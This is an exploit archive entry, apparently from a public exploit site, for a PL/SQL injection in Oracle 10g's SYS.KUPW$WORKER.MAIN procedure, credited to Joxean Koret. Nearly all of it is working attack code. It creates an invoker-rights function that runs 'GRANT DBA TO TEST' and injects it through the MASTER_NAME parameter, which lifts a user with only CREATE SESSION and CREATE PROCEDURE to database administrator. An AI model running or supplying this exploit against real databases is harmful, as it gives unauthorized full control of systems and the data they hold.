Oracle 10g SYS.KUPW$WORKER.MAIN PL-SQL Injection Exploit

2007-01-23 00:00:00

/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret <[email protected]>
* Privileges needed:
*
* - CREATE SESSION
* - CREATE PROCEDURE
*
*/
select *
from user_role_privs
;

CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
RETURN(1);
END;
/

DECLARE
MASTER_NAME VARCHAR2(200);
MASTER_OWNER VARCHAR2(200);
BEGIN
MASTER_NAME := ''' or ' || user || '.f1=1--';
MASTER_OWNER := 'bla';
SYS.KUPW$WORKER.MAIN(
MASTER_NAME => MASTER_NAME,
MASTER_OWNER => MASTER_OWNER
);
END;
/

select *
from user_role_privs
;

//

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.